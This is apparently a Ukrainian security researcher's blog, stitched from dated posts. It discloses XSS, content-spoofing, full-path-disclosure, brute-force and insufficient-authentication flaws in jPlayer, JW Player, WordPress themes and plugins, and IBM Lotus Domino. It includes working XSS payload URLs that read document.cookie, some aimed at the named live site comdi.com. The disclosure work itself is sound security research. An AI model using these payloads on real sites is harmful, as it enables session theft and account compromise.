Websecurity - Веб безпека

В даній добірці уразливості в веб додатках:

• Fortigate UTM WAF Appliance - Cross Site Vulnerabilities (деталі)
• Fortigate UTM WAF Appliance - Multiple Web Vulnerabilities (деталі)
• Novell GroupWise iCalendar Date/Time Parsing Denial of Service (деталі)
• Fortigate UTM WAF Appliance - Multiple Web Vulnerabilities (деталі)
• RSA BSAFE Micro Edition Suite Security Update for BEAST (Browser Exploit Against SSL/TLS) attacks (деталі)
• Vulnerability in Beaker (at using PyCrypto) (деталі)
• RSA BSAFE SSL-C Multiple Vulnerabilities (деталі)
• TP-LINK TL-WR841N XSS (Cross Site Scripting) (деталі)
• TP-LINK TL-WR841N LFI (деталі)
• Multiple peristent XSS, XSS, XSRF, offsite redirection and information disclosure flaws within CheckPoint/Sofaware firewalls (деталі)

16.05.2012

У травні, 03.05.2012, під час пентесту, я виявив багато уразливостей в IBM Lotus Domino, зокрема Brute Force та Insufficient Authentication. Це друга порція уразливостей в Lotus Domino. Про що найближчим часом повідомлю розробникам системи.

Раніше я вже писав про уразливості в IBM Lotus Domino.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам.

26.04.2013

Brute Force (WASC-11):

Дані сторінки, що вимагають аутентифікацію, не мають захисту від BF атак.

http://site/names.nsf
http://site/admin4.nsf
http://site/busytime.nsf
http://site/catalog.nsf
http://site/certsrv.nsf
http://site/domlog.nsf
http://site/events4.nsf
http://site/log.nsf
http://site/statrep.nsf
http://site/webadmin.nsf
http://site/web/war.nsf

Існує два варіанти форми логіна: Basic Authentication та html-форма. І в обох випадках має місце BF уразливість. Перший варіант я виявив під час пентесту ще в 2008, а під час пентесту в 2012 я виявив сайти, що використовували обидва варіанти.

Insufficient Authentication (WASC-01):

Непривілейований користувач (з будь-яким акаунтом на сайті, доступ до якого може бути отриманий через Brute Force уразливість) має доступ до наступних сторінок:

https://site/names.nsf - витік інформації про всіх користувачів (імена, прізвища, логіни, емайли та інша персональна інформація і налаштування)

https://site/admin4.nsf - витік інформації про дії адміністратора (Administration Requests), включаючи персональну інформацію (імена, прізвища, логіни та інше)

https://site/catalog.nsf - витік інформації про файли на сервері, про встановлені програми і про їх налаштування (Application Catalog), включаючи персональну інформацію (імена, прізвища, логіни та інше)

https://site/events4.nsf - витік інформації про події (Monitoring Configuration)

Після отримання доступу до names.nsf, можна використати Information Leakage уразливість, що знайдена Leandro Meiners в 2005 (для отримання хешів паролів) і яка досі не виправлена. IBM не виправила її в дефолтній конфігурації, а лише порадила прибрати поле хеша з профайлів, або використати солені хеші. Мій клієнт використав саме солені хеші й це не допомогло (99% хешів були підібрані, включаючи адмінський).

Уразливі IBM Lotus Domino 8.5.3, 8.5.4, 9.0 та попередні версії. В версії Domino 9.0, що вийшла у березні, IBM так і не виправила дані уразливості. Як нещодавно мені повідомили з IBM, майже через рік після мого інформування про ці уразливості, вони не виправили їх, бо не бачать в цьому потреби. Бо за їх словами в Domino існують вбудовані механізми для захисту від BF та IA, тому ці дірки не є проблемою додатку (а проблемою конкретних сайтів).

Тобто власники сайтів Lotus Domino повинні краще його налаштовувати для захисту від даних атак. З чим я не згоден, так як на всіх сайтах на Domino, що я перевіряв під час пентестів, були саме такі налаштування (схоже, що це налаштування по замовчуванню) і мали місце дані уразливості. Тобто це проблема саме Domino.

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Traffic Analyzer, Spiffy XSPF Player та Spider Video Player. Для котрих з’явилися експлоіти. Traffic Analyzer - це плагін для аналіза трафіка, Spiffy XSPF Player - це медіа плеєр, Spider Video Player - це відео плеєр.

• WordPress Traffic Analyzer Cross Site Scripting (деталі)
• WordPress Spiffy XSPF Player 0.1 SQL Injection (деталі)
• WordPress Spider Video Player 2.1 SQL Injection (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

У січні, 31.01.2013, я виявив Cross-Site Scripting, Content Spoofing та Full path disclosure уразливості в темах для WordPress, що містять jPlayer.

Раніше я писав про XSS та Content Spoofing уразливості в jPlayer. Це дуже поширена флешка, що знаходиться на десятках тисяч веб сайтів і яка використовується в сотнях веб додатків. Зокрема в багатьох плагінах і темах для WordPress. Плюс є багато сайтів, на яких Jplayer.swf розміщена в інших папках окрім плагінів і тем. При стандартному пошуку через Гугл дорки виводиться 32000 сайтів з Jplayer.swf, а при пошуку по темам для WordPress можна знайти 313000 сайтів з цією флешкою.

Цей плеєр міститься в багатьох темах (шаблонах) для WordPress. Серед них Studiozen, Photocrati, Music, Imperial Fairytale та Feather12. Та тисячі інших уразливих тем для WordPress (судячи з гугл дорка). Розробники jPlayer випустили оновлення свого плеєра і всім розробникам веб додатків з jPlayer потрібно його оновити в своїх додатках.

Cross-Site Scripting (WASC-08):

В різних версіях jPlayer різні XSS уразливості.

Studiozen:

http://site/wp-content/themes/studiozen/js/html5player/Jplayer.swf?id=%27))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//

Photocrati:

http://site/wp-content/themes/photocrati-theme/scripts/Jplayer.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//

Music:

http://site/wp-content/themes/music/js/Jplayer.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//

Imperial Fairytale:

http://site/wp-content/themes/imperial-fairytale/assets/swf/Jplayer.swf?jQuery=document.write&id=%3Cimg%20src=1%20onerror=alertu0028document.cookieu0029%3E

Feather12:

http://site/wp-content/themes/feather12/js/Jplayer.swf?jQuery=)}catch(e){}if(!self.a)self.a=!alert(document.cookie)//
http://site/wp-content/themes/feather12/js/Jplayer.swf?id=%27))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//

Content Spoofing (WASC-12):

Можна проводити CS (включення аудіо/відео файлів з зовнішніх ресурсів) через JS і XSS через JS калбеки. Для цього необхідна HTML Injection уразливість на цільовому сайті. Атака аналогічна XSS через калбеки в JW Player.

Full path disclosure (WASC-13):

Всі зазначені теми мають FPD уразливості в php-файлах (в index.php та інших), що типово для WP тем.

http://site/wp-content/themes/studiozen/

http://site/wp-content/themes/photocrati-theme/

http://site/wp-content/themes/music/

http://site/wp-content/themes/imperial-fairytale/

http://site/wp-content/themes/feather12/

Вразливі наступні веб додатки: всі версії тем Studiozen, Photocrati, Music, Imperial Fairytale та Feather12.

Дані XSS уразливості виправлені в версії jPlayer 2.2.23 (але не виправлені CS через JS і XSS атаки через JS калбеки, а також в версії 2.3.0 працюють інші обхідні методи атаки, про що я вже писав розробникам jPlayer у березні та нагадав ще раз). Тому розробникам даних та інших плагінів для WP з jPlayer потрібно оновити його до останньої версії.

27.12.2012

У листопаді, 22.11.2012, я знайшов Content Spoofing та Cross-Site Scripting уразливості на комерційному проекті http://www.comdi.com. Про що вже сповістив адміністрацію сайта.

Стосовно дірок на e-commerce сайтах та сайтах електронних платіжних систем в останнє я писав про уразливості на www.payu.ua.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

24.04.2013

Content Spoofing:

http://www.comdi.com/bitrix/components/bitrix/player/mediaplayer/player.swf?abouttext=Player&aboutlink=http://site

XSS:

http://www.comdi.com/bitrix/components/bitrix/player/mediaplayer/player.swf?playerready=alert(document.cookie)
http://www.comdi.com/bitrix/components/bitrix/player/mediaplayer/player.swf?abouttext=Player&aboutlink=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B

Та інші Content Spoofing та Cross-Site Scripting уразливості в JW Player.

Дані уразливості досі не виправлені.

В даній добірці уразливості в веб додатках:

• (0Day) HP SiteScope SOAP Call getFileInternal Remote Code Execution Vulnerability (деталі)
• EMC NetWorker Module for Microsoft Applications (NMM) Multiple Vulnerabilities (деталі)
• (0Day) HP SiteScope SOAP Call loadFileContent Remote Code Execution Vulnerability (деталі)
• tinyproxy security update (деталі)
• (0Day) HP SiteScope SOAP Call update Remote Code Execution Vulnerability (деталі)
• FreeRADIUS: Stack Overflow in TLS-based EAP Methods (деталі)
• freeradius security update (деталі)
• Memory corruption vulnerabilities in Konqueror (деталі)
• HP Performance Insight with Sybase, Remote Denial of Service (DoS) and Loss of Data (деталі)
• Mesa vulnerability, as used in Google Chrome (деталі)

У січні, 31.01.2013, я виявив Cross-Site Scripting та Content Spoofing уразливості в плагінах для WordPress, що містять jPlayer. Про що вже сповістив розробників п’яти наведених плагінів.

Раніше я писав про XSS та Content Spoofing уразливості в jPlayer. Це дуже поширена флешка, що знаходиться на десятках тисяч веб сайтів і яка використовується в сотнях веб додатків. При стандартному пошуку через Гугл дорки виводиться 32000 сайтів з Jplayer.swf, а при пошуку по плагінам для WordPress можна знайти 239000 сайтів з цією флешкою.

Цей плеєр міститься в багатьох плагінах для WordPress. Серед них MP3-jPlayer, Haiku minimalist audio player, Background Music, Jammer і WP jPlayer. Та існують інші уразливі плагіни для WordPress з Jplayer.swf (судячи з гугл дорка). Розробники jPlayer випустили оновлення свого плеєра і всім розробникам веб додатків з jPlayer потрібно його оновити в своїх додатках.

Cross-Site Scripting (WASC-08):

В різних версіях jPlayer різні XSS уразливості.

MP3-jPlayer:

http:/site/wp-content/plugins/mp3-jplayer/js/Jplayer.swf?jQuery=document.write&id=%3Cimg%20src=1%20onerror=alert\u0028document.cookie\u0029%3E

Haiku minimalist audio player:

http:/site/wp-content/plugins/haiku-minimalist-audio-player/js/Jplayer.swf?jQuery=document.write&id=%3Cimg%20src=1%20onerror=alert\u0028document.cookie\u0029%3E

Background Music:

http:/site/wp-content/plugins/background-music/js/Jplayer.swf?jQuery=document.write&id=%3Cimg%20src=1%20onerror=alert\u0028document.cookie\u0029%3E

Jammer:

http:/site/wp-content/plugins/jammer/files/Jplayer.swf?jQuery=document.write&id=%3Cimg%20src=1%20onerror=alert\u0028document.cookie\u0029%3E

WP jPlayer:

http:/site/wp-content/plugins/wp-jplayer/assets/js/Jplayer.swf?jQuery=)}catch(e){}if(!self.a)self.a=!alert(document.cookie)//
http:/site/wp-content/plugins/wp-jplayer/assets/js/Jplayer.swf?id='))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//

Content Spoofing (WASC-12):

Можна проводити CS (включення аудіо/відео файлів з зовнішніх ресурсів) через JS і XSS через JS калбеки. Для цього необхідна HTML Injection уразливість на цільовому сайті. Атака аналогічна XSS через калбеки в JW Player.

Вразливі наступні веб додатки: MP3-jPlayer 1.8.3 і попередні версії, Haiku minimalist audio player 1.0.0 і попередні версії, Background Music 1.0 і попередні версії, Jammer 0.2 і попередні версії, WP jPlayer 0.1 і попередні версії.

Дані XSS уразливості виправлені в версії jPlayer 2.2.23 (але не виправлені CS через JS і XSS атаки через JS калбеки, а також в версії 2.3.0 працюють інші обхідні методи атаки, про що я вже писав розробникам jPlayer у березні та нагадав ще раз). Тому розробникам даних та інших плагінів для WP з jPlayer потрібно оновити його до останньої версії.

14.03.2013

У січні, 31.01.2013, я виявив Cross-Site Scripting та Content Spoofing уразливості в jPlayer. Про що найближчим часом повідомлю розробникам.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам.

20.04.2013

Cross-Site Scripting (WASC-08):

В різних версія jPlayer різні XSS уразливості.

0.2.1 - 1.2.0:

http:/site/Jplayer.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//

2.0.0:

http:/site/Jplayer.swf?id=%27))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//

2.1.0:

http:/site/Jplayer.swf?jQuery=)}catch(e){}if(!self.a)self.a=!alert(document.cookie)//
http:/site/Jplayer.swf?id=%27))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//

В версії 2.2.0 ці XSS уразливості вже виправлені. Але Malte Batram (в версії 2.2.19) і я (в версії 2.2.20) виявили нові.

2.2.0 - 2.2.19 (і попередні версії):

Атака працює в Firefox (всі версії та браузери на движку Gecko), IE6 і Opera 10.62.

http:/site/Jplayer.swf?jQuery=document.write&id=%3Cimg%20src=1%20onerror=alert\u0028document.cookie\u0029%3E

2.2.20 - 2.2.22 (і попередні версії):

http:/site/Jplayer.swf?jQuery=alert&id=XSS

Content Spoofing (WASC-12):

Можна проводити CS (включення аудіо/відео файлів з зовнішніх ресурсів) через JS і XSS через JS калбеки. Для цього необхідна HTML Injection уразливість на цільовому сайті. Атака аналогічна XSS через калбеки в JW Player.

Уразливі версії до jPlayer 2.2.23. Версія 2.2.23 і остання версія 2.3.0 не є вразливими до наведених XSS, окрім CS через JS і XSS атак через JS калбеки. Також в версії 2.3.0 працюють інші обхідні методи атаки, які вони не виправили окрім атаки через alert. Про що я вже писав розробникам у березні та нагадав ще раз.

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Mathjax Latex, podPress та FuneralPress. Для котрих з’явилися експлоіти. Mathjax Latex - це плагін для додання підтримки latex і mathml формул, podPress - це плагін для подкастінга, FuneralPress - це похоронний менеджер та гостьова книга.

• WordPress Mathjax Latex 1.1 Cross Site Request Forgery (деталі)
• WordPress podPress 8.8.10.13 Cross Site Scripting (деталі)
• WordPress FuneralPress 1.1.6 Cross Site Scripting (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Раніше я вже писав про численні уразливості в численних темах для WordPress виробництва RocketTheme. Окрім тем цих розробників я виявив подібні уразливості в багатьох темах інших розробників (в тому числі в custom темах).

У грудні, 22.12.2012, я знайшов Cross-Site Scripting, Content Spoofing та Full path disclosure уразливості в темі Colormix для WordPress. Що аналогічні уразливостям в темах для WP від RocketTheme.

XSS (WASC-08):

http://site/wp-content/themes/colormix/js/rokbox/jwplayer/jwplayer.swf?abouttext=Player&aboutlink=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B

Content Spoofing (WASC-12):

http://site/wp-content/themes/colormix/js/rokbox/jwplayer/jwplayer.swf?file=1.flv&backcolor=0xFFFFFF&screencolor=0xFFFFFF
http://site/wp-content/themes/colormix/js/rokbox/jwplayer/jwplayer.swf?file=1.flv&image=1.jpg
http://site/wp-content/themes/colormix/js/rokbox/jwplayer/jwplayer.swf?config=1.xml
http://site/wp-content/themes/colormix/js/rokbox/jwplayer/jwplayer.swf?abouttext=Player&aboutlink=http://site

Full path disclosure (WASC-13):

В папці http://site/wp-content/themes/colormix/ в index.php та багатьох інших php-файлах теми є FPD, що спрацьовують при налаштуваннях PHP по замовчуванню.

Уразливі всі версії теми Colormix для WordPress.